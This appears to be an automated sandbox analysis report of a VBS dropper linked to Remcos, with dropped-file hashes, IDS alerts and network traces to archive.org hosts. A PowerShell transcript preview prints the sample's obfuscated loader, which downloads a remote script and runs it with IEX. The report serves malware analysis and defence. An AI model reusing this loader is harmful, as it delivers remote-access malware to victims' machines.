Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	high, very likely benign file
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mkckfnlm.axd.ps1 Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nbyvf4gi.2e2.ps1 Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Roaming\remcos\logs.dat Download File
Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
File Type:	data
Category:	dropped
Size (bytes):	148
Entropy (8bit):	6.72627921019431
Encrypted:	false
SSDEEP:	3:BubaILAF2+CI3rhR5JVsz1mjiQ9S/w4PHvrUqDiGolr9Cin:sbaAu3rvVsz1mjiQ9SY4nrGz
MD5:	9FE28208A664DB9CD653324C6653220B
SHA1:	FB23DBEAB100296263A41BEACCB30FFD7B019CE3
SHA-256:	C2A236B1E56A8118DA9DC76EAA270E20D639BA6D6033234AA9C9728F563E18F5
SHA-512:	96B953AB0974730AFFBF4F6D9A5FB750B9183EE7BA5C3D1A4C4338A2D513DCBC4787BE9944C72A103274CA0A991D3F90148AEAE0EFB0579528FD8F1D6E88E7D9
Malicious:	true
Preview:	.`..X.9.o....,...]..~..-P..%...[.?...R..0...f.O..r....9....o........o.ZaC....ql..6.Lxp..F1.}.@..J.g..8...1>V_.@w.~.\|..O.. ....%YW.....,Vg...B..

C:\Users\user\Documents\20210421\PowerShell_transcript.367706.ZKCUyeEJ.20210421153709.txt Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	2545
Entropy (8bit):	5.40691350403606
Encrypted:	false
SSDEEP:	48:BZ7vTLJoOaKFMqDYB1ZhZTqvTLJoOaKFMqDYB1ZkpJ1vqAfG7eJ1vqAfG7d:BZbTLJNlSqDo1ZhZiTLJNlSqDo1ZkpTs
MD5:	BE89BE431474522D0993E6401FBE5DCA
SHA1:	15C9DE40607705C2189261353E72A04BCF1DF1A7
SHA-256:	35866BA6A0B1FC881E454346AE98A64D8E570A660AA2CB952BF46F6B73FB466C
SHA-512:	55FCB687B194F9CDAA13ABED6FEA49C11F35BF71ED348CF4963A24991E0DE54C6A94ABCFE82358B761B5F6EE801FC82D61B25E0B73E51B8B17BA4FCF3CB6CE16
Malicious:	false
Preview:	.********************..Windows PowerShell transcript start..Start time: 20210421153709..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 367706 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -windo 1 -noexit -exec bypass -file C:\Users\Public\ Microsoft.ps1..Process ID: 6868..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..******************..********************..Windows PowerShell transcript start..Start time: 20210421154228..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 367706 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -windo 1 -n

C:\Users\user\Documents\20210421\PowerShell_transcript.367706.fOfA42_i.20210421153634.txt Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	1670
Entropy (8bit):	5.573278963172669
Encrypted:	false
SSDEEP:	48:BZnvTLJoONHcd50T43nqDYB1ZVHcd50Th:BZvTLJNNHS50mqDo1ZVHS50l
MD5:	7287E79302DAE4A9A93BB48E5694D7DE
SHA1:	8FF90DD7C5B616AC126293DFFB410C5FD1F9409A
SHA-256:	43ECAAB26D7124F46272523772CA1ED7E55AD8CBE19CF542F574ED2432177B11
SHA-512:	FC56A94CBE9BB275A45EC483B531812AE86E3B69B3413EDC73F76306F41756BE120EDB156D2ADAB49679F6463A7F2CAD3B2B5C910E50C82FF96BE9F73CD1AC78
Malicious:	false
Preview:	.**********************..Windows PowerShell transcript start..Start time: 20210421153635..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 367706 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe $v0 ='N#t.@@#b'.Replace('#','e').Replace('@@','w');$v00 = '%li!!'.Replace('%','C').Replace('!!','ent');$V000 = 'D$$$$$$$$$$$n%%%%%%%%%%%%ng'.Replace('%%%%%%%%%%%%','loadStri').Replace('$$$$$$$$$$$','ow');$v1 = '$e^'.replace('$','I').replace('^','x');$v9999 = '(Ne`W&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&00(''https://ia601509.us.archive.org/35/items/all_20210420_20210420_1440/ALL.TXT'')'.Replace('&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&','-O`BjEcT $v0$v00 ).$V0');$TC=I`E`X ($v9999 -Join '')\|I`E`X..Process ID: 6632..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersio

Static File Info

General
File type:	ASCII text, with CRLF line terminators
Entropy (8bit):	5.365221582242173
TrID:
File name:	Appraisa.vbs
File size:	662
MD5:	2e95d045ff86903502b52f5fd0976aad
SHA1:	c74e479ff249f1e8c248b8a67e318a61b1f1d5e4
SHA256:	dae93e987a854255ff55ce9f62729f17f57d3f8a56933a57cb8de89b698e81f0
SHA512:	0427fa613d91d41c98dfb7d9a964c74857813959f427eb060a1a39c2cf289235aaa0aec6015cea8d7bd16da1e14bae3ba88c998780d33ea6faf9d0b8102264df
SSDEEP:	12:Whmlh4iBHodpd0LynPFhyBF3zTcg3OlXof70jRu+lNmY/OLAW:Wk80Hgd1niBF3zl3Ol4fYRu6NmTLAW
File Content Preview:	Dim ox..Set ox= CreateObject("WScript.Shell")..aa="p" +"o" & "w"..bb="e" & "rs"..cc="h" & "ell"..dd = " $v0 ='N#t.@@#b'.Replace('#','e').Replace('@@','w');$v00 = '%li!!'.Replace('%','C').R"..ee ="eplace('!!','ent');$V000 = 'D$$$$$$$$$$$n%%%%%%%%%%%%ng'.Re

File Icon


Icon Hash:	e8d69ece869a9ec4

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source IP	Dest IP
04/21/21-15:36:30.895509	ICMP	384	ICMP PING	192.168.2.6	93.184.221.240
04/21/21-15:36:30.930419	ICMP	449	ICMP Time-To-Live Exceeded in Transit	84.17.52.126	192.168.2.6
04/21/21-15:36:30.930883	ICMP	384	ICMP PING	192.168.2.6	93.184.221.240
04/21/21-15:36:30.965981	ICMP	449	ICMP Time-To-Live Exceeded in Transit	5.56.20.161	192.168.2.6
04/21/21-15:36:30.967242	ICMP	384	ICMP PING	192.168.2.6	93.184.221.240
04/21/21-15:36:31.008045	ICMP	449	ICMP Time-To-Live Exceeded in Transit	81.95.15.57	192.168.2.6
04/21/21-15:36:31.010844	ICMP	384	ICMP PING	192.168.2.6	93.184.221.240
04/21/21-15:36:31.053460	ICMP	449	ICMP Time-To-Live Exceeded in Transit	152.195.101.202	192.168.2.6
04/21/21-15:36:31.054456	ICMP	384	ICMP PING	192.168.2.6	93.184.221.240
04/21/21-15:36:31.095745	ICMP	449	ICMP Time-To-Live Exceeded in Transit	152.195.101.129	192.168.2.6
04/21/21-15:36:31.097487	ICMP	384	ICMP PING	192.168.2.6	93.184.221.240
04/21/21-15:36:31.138048	ICMP	408	ICMP Echo Reply	93.184.221.240	192.168.2.6

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 21, 2021 15:36:37.798676968 CEST	49716	443	192.168.2.6	207.241.227.119
Apr 21, 2021 15:36:37.998881102 CEST	443	49716	207.241.227.119	192.168.2.6
Apr 21, 2021 15:36:37.999038935 CEST	49716	443	192.168.2.6	207.241.227.119
Apr 21, 2021 15:36:38.015621901 CEST	49716	443	192.168.2.6	207.241.227.119
Apr 21, 2021 15:36:38.215732098 CEST	443	49716	207.241.227.119	192.168.2.6
Apr 21, 2021 15:36:38.215948105 CEST	443	49716	207.241.227.119	192.168.2.6
Apr 21, 2021 15:36:38.215981007 CEST	443	49716	207.241.227.119	192.168.2.6
Apr 21, 2021 15:36:38.216006041 CEST	443	49716	207.241.227.119	192.168.2.6
Apr 21, 2021 15:36:38.216022968 CEST	443	49716	207.241.227.119	192.168.2.6
Apr 21, 2021 15:36:38.216057062 CEST	49716	443	192.168.2.6	207.241.227.119
Apr 21, 2021 15:36:38.216070890 CEST	49716	443	192.168.2.6	207.241.227.119
Apr 21, 2021 15:36:38.218630075 CEST	443	49716	207.241.227.119	192.168.2.6
Apr 21, 2021 15:36:38.218647957 CEST	443	49716	207.241.227.119	192.168.2.6
Apr 21, 2021 15:36:38.218822956 CEST	49716	443	192.168.2.6	207.241.227.119
Apr 21, 2021 15:36:38.231710911 CEST	49716	443	192.168.2.6	207.241.227.119
Apr 21, 2021 15:36:38.432408094 CEST	443	49716	207.241.227.119	192.168.2.6
Apr 21, 2021 15:36:38.463846922 CEST	49716	443	192.168.2.6	207.241.227.119
Apr 21, 2021 15:36:38.665452003 CEST	443	49716	207.241.227.119	192.168.2.6
Apr 21, 2021 15:36:38.665479898 CEST	443	49716	207.241.227.119	192.168.2.6
Apr 21, 2021 15:36:38.665635109 CEST	49716	443	192.168.2.6	207.241.227.119
Apr 21, 2021 15:36:39.665543079 CEST	443	49716	207.241.227.119	192.168.2.6
Apr 21, 2021 15:36:39.665575981 CEST	443	49716	207.241.227.119	192.168.2.6
Apr 21, 2021 15:36:39.667232990 CEST	49716	443	192.168.2.6	207.241.227.119
Apr 21, 2021 15:36:53.907334089 CEST	49716	443	192.168.2.6	207.241.227.119
Apr 21, 2021 15:36:53.982124090 CEST	49722	443	192.168.2.6	207.241.228.140
Apr 21, 2021 15:36:54.186433077 CEST	443	49722	207.241.228.140	192.168.2.6
Apr 21, 2021 15:36:54.186671019 CEST	49722	443	192.168.2.6	207.241.228.140
Apr 21, 2021 15:36:54.187385082 CEST	49722	443	192.168.2.6	207.241.228.140
Apr 21, 2021 15:36:54.390470028 CEST	443	49722	207.241.228.140	192.168.2.6
Apr 21, 2021 15:36:54.390527010 CEST	443	49722	207.241.228.140	192.168.2.6
Apr 21, 2021 15:36:54.390547991 CEST	443	49722	207.241.228.140	192.168.2.6
Apr 21, 2021 15:36:54.390567064 CEST	443	49722	207.241.228.140	192.168.2.6
Apr 21, 2021 15:36:54.390578985 CEST	443	49722	207.241.228.140	192.168.2.6
Apr 21, 2021 15:36:54.390669107 CEST	49722	443	192.168.2.6	207.241.228.140
Apr 21, 2021 15:36:54.390724897 CEST	49722	443	192.168.2.6	207.241.228.140
Apr 21, 2021 15:36:54.392797947 CEST	443	49722	207.241.228.140	192.168.2.6
Apr 21, 2021 15:36:54.392833948 CEST	443	49722	207.241.228.140	192.168.2.6
Apr 21, 2021 15:36:54.392971992 CEST	49722	443	192.168.2.6	207.241.228.140
Apr 21, 2021 15:36:54.394560099 CEST	49722	443	192.168.2.6	207.241.228.140
Apr 21, 2021 15:36:54.598280907 CEST	443	49722	207.241.228.140	192.168.2.6
Apr 21, 2021 15:36:54.600944996 CEST	443	49722	207.241.228.140	192.168.2.6
Apr 21, 2021 15:36:54.602577925 CEST	49722	443	192.168.2.6	207.241.228.140
Apr 21, 2021 15:36:54.804791927 CEST	443	49722	207.241.228.140	192.168.2.6
Apr 21, 2021 15:36:54.804821968 CEST	443	49722	207.241.228.140	192.168.2.6
Apr 21, 2021 15:36:54.848720074 CEST	49722	443	192.168.2.6	207.241.228.140
Apr 21, 2021 15:36:55.830255985 CEST	443	49722	207.241.228.140	192.168.2.6
Apr 21, 2021 15:36:55.830287933 CEST	443	49722	207.241.228.140	192.168.2.6
Apr 21, 2021 15:36:55.830871105 CEST	49722	443	192.168.2.6	207.241.228.140
Apr 21, 2021 15:36:59.887038946 CEST	49727	443	192.168.2.6	207.241.227.121
Apr 21, 2021 15:37:00.089093924 CEST	443	49727	207.241.227.121	192.168.2.6
Apr 21, 2021 15:37:00.089308977 CEST	49727	443	192.168.2.6	207.241.227.121
Apr 21, 2021 15:37:00.089762926 CEST	49727	443	192.168.2.6	207.241.227.121
Apr 21, 2021 15:37:00.289805889 CEST	443	49727	207.241.227.121	192.168.2.6
Apr 21, 2021 15:37:00.289962053 CEST	443	49727	207.241.227.121	192.168.2.6
Apr 21, 2021 15:37:00.289989948 CEST	443	49727	207.241.227.121	192.168.2.6
Apr 21, 2021 15:37:00.290007114 CEST	443	49727	207.241.227.121	192.168.2.6
Apr 21, 2021 15:37:00.290019989 CEST	443	49727	207.241.227.121	192.168.2.6
Apr 21, 2021 15:37:00.290095091 CEST	49727	443	192.168.2.6	207.241.227.121
Apr 21, 2021 15:37:00.290128946 CEST	49727	443	192.168.2.6	207.241.227.121
Apr 21, 2021 15:37:00.292644978 CEST	443	49727	207.241.227.121	192.168.2.6
Apr 21, 2021 15:37:00.292671919 CEST	443	49727	207.241.227.121	192.168.2.6
Apr 21, 2021 15:37:00.292876005 CEST	49727	443	192.168.2.6	207.241.227.121
Apr 21, 2021 15:37:00.296108007 CEST	49727	443	192.168.2.6	207.241.227.121
Apr 21, 2021 15:37:00.497781992 CEST	443	49727	207.241.227.121	192.168.2.6
Apr 21, 2021 15:37:00.498446941 CEST	443	49727	207.241.227.121	192.168.2.6
Apr 21, 2021 15:37:00.499718904 CEST	49727	443	192.168.2.6	207.241.227.121
Apr 21, 2021 15:37:00.700664997 CEST	443	49727	207.241.227.121	192.168.2.6
Apr 21, 2021 15:37:00.728194952 CEST	443	49727	207.241.227.121	192.168.2.6
Apr 21, 2021 15:37:00.728225946 CEST	443	49727	207.241.227.121	192.168.2.6
Apr 21, 2021 15:37:00.728239059 CEST	443	49727	207.241.227.121	192.168.2.6
Apr 21, 2021 15:37:00.728256941 CEST	443	49727	207.241.227.121	192.168.2.6
Apr 21, 2021 15:37:00.728272915 CEST	443	49727	207.241.227.121	192.168.2.6
Apr 21, 2021 15:37:00.728288889 CEST	443	49727	207.241.227.121	192.168.2.6
Apr 21, 2021 15:37:00.728307009 CEST	443	49727	207.241.227.121	192.168.2.6
Apr 21, 2021 15:37:00.728327036 CEST	443	49727	207.241.227.121	192.168.2.6
Apr 21, 2021 15:37:00.728343964 CEST	49727	443	192.168.2.6	207.241.227.121
Apr 21, 2021 15:37:00.728352070 CEST	443	49727	207.241.227.121	192.168.2.6
Apr 21, 2021 15:37:00.728370905 CEST	443	49727	207.241.227.121	192.168.2.6
Apr 21, 2021 15:37:00.728383064 CEST	443	49727	207.241.227.121	192.168.2.6
Apr 21, 2021 15:37:00.728394985 CEST	443	49727	207.241.227.121	192.168.2.6
Apr 21, 2021 15:37:00.728399038 CEST	49727	443	192.168.2.6	207.241.227.121
Apr 21, 2021 15:37:00.728405952 CEST	443	49727	207.241.227.121	192.168.2.6
Apr 21, 2021 15:37:00.728496075 CEST	49727	443	192.168.2.6	207.241.227.121
Apr 21, 2021 15:37:00.931282043 CEST	443	49727	207.241.227.121	192.168.2.6
Apr 21, 2021 15:37:00.931308985 CEST	443	49727	207.241.227.121	192.168.2.6
Apr 21, 2021 15:37:00.931328058 CEST	443	49727	207.241.227.121	192.168.2.6
Apr 21, 2021 15:37:00.931344986 CEST	443	49727	207.241.227.121	192.168.2.6
Apr 21, 2021 15:37:00.931361914 CEST	443	49727	207.241.227.121	192.168.2.6
Apr 21, 2021 15:37:00.931377888 CEST	443	49727	207.241.227.121	192.168.2.6
Apr 21, 2021 15:37:00.931396008 CEST	443	49727	207.241.227.121	192.168.2.6
Apr 21, 2021 15:37:00.931415081 CEST	443	49727	207.241.227.121	192.168.2.6
Apr 21, 2021 15:37:00.931432009 CEST	443	49727	207.241.227.121	192.168.2.6
Apr 21, 2021 15:37:00.931441069 CEST	49727	443	192.168.2.6	207.241.227.121
Apr 21, 2021 15:37:00.931447983 CEST	443	49727	207.241.227.121	192.168.2.6
Apr 21, 2021 15:37:00.931468010 CEST	443	49727	207.241.227.121	192.168.2.6
Apr 21, 2021 15:37:00.931483984 CEST	443	49727	207.241.227.121	192.168.2.6
Apr 21, 2021 15:37:00.931483030 CEST	49727	443	192.168.2.6	207.241.227.121
Apr 21, 2021 15:37:00.931499958 CEST	443	49727	207.241.227.121	192.168.2.6
Apr 21, 2021 15:37:00.931516886 CEST	443	49727	207.241.227.121	192.168.2.6
Apr 21, 2021 15:37:00.931533098 CEST	443	49727	207.241.227.121	192.168.2.6

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 21, 2021 15:36:24.675837040 CEST	57725	53	192.168.2.6	8.8.8.8
Apr 21, 2021 15:36:24.733067989 CEST	53	57725	8.8.8.8	192.168.2.6
Apr 21, 2021 15:36:24.792572021 CEST	49283	53	192.168.2.6	8.8.8.8
Apr 21, 2021 15:36:24.842449903 CEST	53	49283	8.8.8.8	192.168.2.6
Apr 21, 2021 15:36:25.355819941 CEST	58377	53	192.168.2.6	8.8.8.8
Apr 21, 2021 15:36:25.398221016 CEST	55074	53	192.168.2.6	8.8.8.8
Apr 21, 2021 15:36:25.423491955 CEST	53	58377	8.8.8.8	192.168.2.6
Apr 21, 2021 15:36:25.465262890 CEST	53	55074	8.8.8.8	192.168.2.6
Apr 21, 2021 15:36:25.957779884 CEST	54513	53	192.168.2.6	8.8.8.8
Apr 21, 2021 15:36:26.006359100 CEST	53	54513	8.8.8.8	192.168.2.6
Apr 21, 2021 15:36:26.730195045 CEST	62044	53	192.168.2.6	8.8.8.8
Apr 21, 2021 15:36:26.780277967 CEST	53	62044	8.8.8.8	192.168.2.6
Apr 21, 2021 15:36:28.063811064 CEST	63791	53	192.168.2.6	8.8.8.8
Apr 21, 2021 15:36:28.121189117 CEST	53	63791	8.8.8.8	192.168.2.6
Apr 21, 2021 15:36:28.968277931 CEST	64267	53	192.168.2.6	8.8.8.8
Apr 21, 2021 15:36:29.025302887 CEST	53	64267	8.8.8.8	192.168.2.6
Apr 21, 2021 15:36:29.115119934 CEST	49448	53	192.168.2.6	8.8.8.8
Apr 21, 2021 15:36:29.184334993 CEST	53	49448	8.8.8.8	192.168.2.6
Apr 21, 2021 15:36:30.695892096 CEST	60342	53	192.168.2.6	8.8.8.8
Apr 21, 2021 15:36:30.747742891 CEST	53	60342	8.8.8.8	192.168.2.6
Apr 21, 2021 15:36:30.818032980 CEST	61346	53	192.168.2.6	8.8.8.8
Apr 21, 2021 15:36:30.891433001 CEST	53	61346	8.8.8.8	192.168.2.6
Apr 21, 2021 15:36:32.356753111 CEST	51774	53	192.168.2.6	8.8.8.8
Apr 21, 2021 15:36:32.405339003 CEST	53	51774	8.8.8.8	192.168.2.6
Apr 21, 2021 15:36:34.122384071 CEST	56023	53	192.168.2.6	8.8.8.8
Apr 21, 2021 15:36:34.173491955 CEST	53	56023	8.8.8.8	192.168.2.6
Apr 21, 2021 15:36:37.721982002 CEST	58384	53	192.168.2.6	8.8.8.8
Apr 21, 2021 15:36:37.785304070 CEST	53	58384	8.8.8.8	192.168.2.6
Apr 21, 2021 15:36:45.752693892 CEST	60261	53	192.168.2.6	8.8.8.8
Apr 21, 2021 15:36:45.805398941 CEST	53	60261	8.8.8.8	192.168.2.6
Apr 21, 2021 15:36:48.259670019 CEST	56061	53	192.168.2.6	8.8.8.8
Apr 21, 2021 15:36:48.319139004 CEST	53	56061	8.8.8.8	192.168.2.6
Apr 21, 2021 15:36:51.059195042 CEST	58336	53	192.168.2.6	8.8.8.8
Apr 21, 2021 15:36:51.119641066 CEST	53	58336	8.8.8.8	192.168.2.6
Apr 21, 2021 15:36:51.860095978 CEST	53781	53	192.168.2.6	8.8.8.8
Apr 21, 2021 15:36:51.909935951 CEST	53	53781	8.8.8.8	192.168.2.6
Apr 21, 2021 15:36:53.127162933 CEST	54064	53	192.168.2.6	8.8.8.8
Apr 21, 2021 15:36:53.184359074 CEST	53	54064	8.8.8.8	192.168.2.6
Apr 21, 2021 15:36:53.914576054 CEST	52811	53	192.168.2.6	8.8.8.8
Apr 21, 2021 15:36:53.980730057 CEST	53	52811	8.8.8.8	192.168.2.6
Apr 21, 2021 15:36:54.270025015 CEST	55299	53	192.168.2.6	8.8.8.8
Apr 21, 2021 15:36:54.321645021 CEST	53	55299	8.8.8.8	192.168.2.6
Apr 21, 2021 15:36:55.424227953 CEST	63745	53	192.168.2.6	8.8.8.8
Apr 21, 2021 15:36:55.472897053 CEST	53	63745	8.8.8.8	192.168.2.6
Apr 21, 2021 15:36:58.014112949 CEST	50055	53	192.168.2.6	8.8.8.8
Apr 21, 2021 15:36:58.062736988 CEST	53	50055	8.8.8.8	192.168.2.6
Apr 21, 2021 15:36:59.181235075 CEST	61374	53	192.168.2.6	8.8.8.8
Apr 21, 2021 15:36:59.238642931 CEST	53	61374	8.8.8.8	192.168.2.6
Apr 21, 2021 15:36:59.826244116 CEST	50339	53	192.168.2.6	8.8.8.8
Apr 21, 2021 15:36:59.886167049 CEST	53	50339	8.8.8.8	192.168.2.6
Apr 21, 2021 15:37:00.077095985 CEST	63307	53	192.168.2.6	8.8.8.8
Apr 21, 2021 15:37:00.128426075 CEST	53	63307	8.8.8.8	192.168.2.6
Apr 21, 2021 15:37:01.075335979 CEST	49694	53	192.168.2.6	8.8.8.8
Apr 21, 2021 15:37:01.129789114 CEST	53	49694	8.8.8.8	192.168.2.6
Apr 21, 2021 15:37:01.888292074 CEST	54982	53	192.168.2.6	8.8.8.8
Apr 21, 2021 15:37:01.939579964 CEST	53	54982	8.8.8.8	192.168.2.6
Apr 21, 2021 15:37:02.444845915 CEST	50010	53	192.168.2.6	8.8.8.8
Apr 21, 2021 15:37:02.504584074 CEST	53	50010	8.8.8.8	192.168.2.6
Apr 21, 2021 15:37:06.512167931 CEST	63718	53	192.168.2.6	8.8.8.8
Apr 21, 2021 15:37:06.573805094 CEST	53	63718	8.8.8.8	192.168.2.6
Apr 21, 2021 15:37:20.601401091 CEST	62116	53	192.168.2.6	8.8.8.8
Apr 21, 2021 15:37:20.663985968 CEST	53	62116	8.8.8.8	192.168.2.6
Apr 21, 2021 15:37:20.764425993 CEST	63816	53	192.168.2.6	8.8.8.8
Apr 21, 2021 15:37:20.826684952 CEST	53	63816	8.8.8.8	192.168.2.6
Apr 21, 2021 15:37:21.894068956 CEST	55014	53	192.168.2.6	8.8.8.8
Apr 21, 2021 15:37:21.951316118 CEST	53	55014	8.8.8.8	192.168.2.6
Apr 21, 2021 15:37:23.822206020 CEST	62208	53	192.168.2.6	8.8.8.8
Apr 21, 2021 15:37:23.887178898 CEST	53	62208	8.8.8.8	192.168.2.6
Apr 21, 2021 15:37:24.477293968 CEST	57574	53	192.168.2.6	8.8.8.8
Apr 21, 2021 15:37:24.559325933 CEST	53	57574	8.8.8.8	192.168.2.6
Apr 21, 2021 15:37:25.330324888 CEST	51818	53	192.168.2.6	8.8.8.8
Apr 21, 2021 15:37:25.387432098 CEST	53	51818	8.8.8.8	192.168.2.6
Apr 21, 2021 15:37:25.636190891 CEST	56628	53	192.168.2.6	8.8.8.8
Apr 21, 2021 15:37:25.704221010 CEST	53	56628	8.8.8.8	192.168.2.6
Apr 21, 2021 15:37:25.805416107 CEST	60778	53	192.168.2.6	8.8.8.8
Apr 21, 2021 15:37:25.909846067 CEST	53	60778	8.8.8.8	192.168.2.6
Apr 21, 2021 15:37:26.481374979 CEST	53799	53	192.168.2.6	8.8.8.8
Apr 21, 2021 15:37:26.545171022 CEST	53	53799	8.8.8.8	192.168.2.6
Apr 21, 2021 15:37:27.563256025 CEST	54683	53	192.168.2.6	8.8.8.8
Apr 21, 2021 15:37:27.834975004 CEST	53	54683	8.8.8.8	192.168.2.6
Apr 21, 2021 15:37:28.342853069 CEST	59329	53	192.168.2.6	8.8.8.8
Apr 21, 2021 15:37:28.401698112 CEST	53	59329	8.8.8.8	192.168.2.6
Apr 21, 2021 15:37:29.284501076 CEST	64021	53	192.168.2.6	8.8.8.8
Apr 21, 2021 15:37:29.347446918 CEST	53	64021	8.8.8.8	192.168.2.6
Apr 21, 2021 15:37:29.842503071 CEST	56129	53	192.168.2.6	8.8.8.8
Apr 21, 2021 15:37:29.900897980 CEST	53	56129	8.8.8.8	192.168.2.6
Apr 21, 2021 15:37:30.973521948 CEST	58177	53	192.168.2.6	8.8.8.8
Apr 21, 2021 15:37:31.030606031 CEST	53	58177	8.8.8.8	192.168.2.6
Apr 21, 2021 15:37:31.595696926 CEST	50700	53	192.168.2.6	8.8.8.8
Apr 21, 2021 15:37:31.652832031 CEST	53	50700	8.8.8.8	192.168.2.6
Apr 21, 2021 15:38:02.805833101 CEST	54069	53	192.168.2.6	8.8.8.8
Apr 21, 2021 15:38:02.865564108 CEST	53	54069	8.8.8.8	192.168.2.6
Apr 21, 2021 15:38:03.185791016 CEST	61178	53	192.168.2.6	8.8.8.8
Apr 21, 2021 15:38:03.247262955 CEST	53	61178	8.8.8.8	192.168.2.6
Apr 21, 2021 15:38:04.195763111 CEST	57017	53	192.168.2.6	8.8.8.8
Apr 21, 2021 15:38:04.245568991 CEST	53	57017	8.8.8.8	192.168.2.6
Apr 21, 2021 15:38:06.152702093 CEST	56327	53	192.168.2.6	8.8.8.8
Apr 21, 2021 15:38:06.216968060 CEST	53	56327	8.8.8.8	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Apr 21, 2021 15:36:37.721982002 CEST	192.168.2.6	8.8.8.8	0xabc7	Standard query (0)	ia601509.us.archive.org	A (IP address)	IN (0x0001)
Apr 21, 2021 15:36:53.914576054 CEST	192.168.2.6	8.8.8.8	0x1a10	Standard query (0)	ia801400.us.archive.org	A (IP address)	IN (0x0001)
Apr 21, 2021 15:36:59.826244116 CEST	192.168.2.6	8.8.8.8	0x71d0	Standard query (0)	ia601401.us.archive.org	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
Apr 21, 2021 15:36:37.785304070 CEST	8.8.8.8	192.168.2.6	0xabc7	No error (0)	ia601509.us.archive.org	207.241.227.119	A (IP address)	IN (0x0001)
Apr 21, 2021 15:36:53.980730057 CEST	8.8.8.8	192.168.2.6	0x1a10	No error (0)	ia801400.us.archive.org	207.241.228.140	A (IP address)	IN (0x0001)
Apr 21, 2021 15:36:59.886167049 CEST	8.8.8.8	192.168.2.6	0x71d0	No error (0)	ia601401.us.archive.org	207.241.227.121	A (IP address)	IN (0x0001)

HTTPS Packets

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
Apr 21, 2021 15:36:38.218630075 CEST	207.241.227.119	443	192.168.2.6	49716	CN=*.us.archive.org, OU=Domain Control Validated CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	Mon Dec 23 14:16:32 CET 2019 Tue May 03 09:00:00 CEST 2011 